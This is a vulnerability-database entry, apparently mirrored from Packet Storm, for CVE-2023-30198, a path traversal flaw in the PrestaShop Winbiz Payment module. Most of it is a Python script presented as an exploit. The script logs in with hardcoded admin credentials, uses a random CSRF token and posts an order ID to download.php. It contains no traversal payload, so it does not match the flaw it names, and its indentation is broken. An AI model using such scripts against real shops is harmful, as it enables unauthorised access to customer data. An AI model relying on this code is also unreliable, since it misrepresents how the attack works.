Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAmirhossein BahramizadehPACKETSTORM:173136
HistoryJun 27, 2023 - 12:00 a.m.

PrestaShop Winbiz Payment Improper Limitation

2023-06-2700:00:00
Amirhossein Bahramizadeh
packetstormsecurity.com
114
exploit
vulnerability
prestashop
winbiz payment
pathname
bypass
csrf
authentication
download
pdf
file write

0.026 Low

EPSS

Percentile

90.4%

JSON
`# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory  
# Date: 2023-06-20  
# Dork: /modules/winbizpayment/downloads/download.php  
# country: Iran  
# Exploit Author: Amirhossein Bahramizadeh  
# Category : webapps  
# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html  
# Version: 17.1.3 (REQUIRED)  
# Tested on: Windows/Linux  
# CVE : CVE-2023-30198  
  
import requests  
import string  
import random  
  
# The base URL of the vulnerable site  
base_url = "http://example.com"  
  
# The URL of the login page  
login_url = base_url + "/authentication.php"  
  
# The username and password for the admin account  
username = "admin"  
password = "password123"  
  
# The URL of the vulnerable download.php file  
download_url = base_url + "/modules/winbizpayment/downloads/download.php"  
  
# The ID of the order to download  
order_id = 1234  
  
# The path to save the downloaded file  
file_path = "/tmp/order_%d.pdf" % order_id  
  
# The session cookies to use for the requests  
session_cookies = None  
  
# Generate a random string for the CSRF token  
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))  
  
# Send a POST request to the login page to authenticate as the admin user  
login_data = {"email": username, "passwd": password, "csrf_token": csrf_token}  
session = requests.Session()  
response = session.post(login_url, data=login_data)  
  
# Save the session cookies for future requests  
session_cookies = session.cookies.get_dict()  
  
# Generate a random string for the CSRF token  
csrf_token = ''.join(random.choices(string.ascii_uppercase + string.digits, k=32))  
  
# Send a POST request to the download.php file to download the order PDF  
download_data = {"id_order": order_id, "csrf_token": csrf_token}  
response = session.post(download_url, cookies=session_cookies, data=download_data)  
  
# Save the downloaded file to disk  
with open(file_path, "wb") as f:  
f.write(response.content)  
  
# Print a message indicating that the file has been downloaded  
print("File downloaded to %s" % file_path)  
  
  
`

Related

cve 1
zdt 1
cvelist 1
nvd 1
prion 1
cnvd 1
exploitdb 1
cve
cve
CVE-2023-30198
2023-06-12 17:15:09
zdt
zdt
PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
2023-06-26 00:00:00
cvelist
cvelist
CVE-2023-30198
2023-06-12 00:00:00
nvd
nvd
CVE-2023-30198
2023-06-12 17:15:09
prion
prion
Improper access control
2023-06-12 17:15:00
cnvd
cnvd
PrestaShop path traversal vulnerability (CNVD-2023-49841)
2023-06-14 00:00:00
exploitdb
exploitdb
PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory
2023-06-26 00:00:00

0.026 Low

EPSS

Percentile

90.4%

JSON
Related for PACKETSTORM:173136
cve1zdt1cvelist1nvd1prion1cnvd1exploitdb1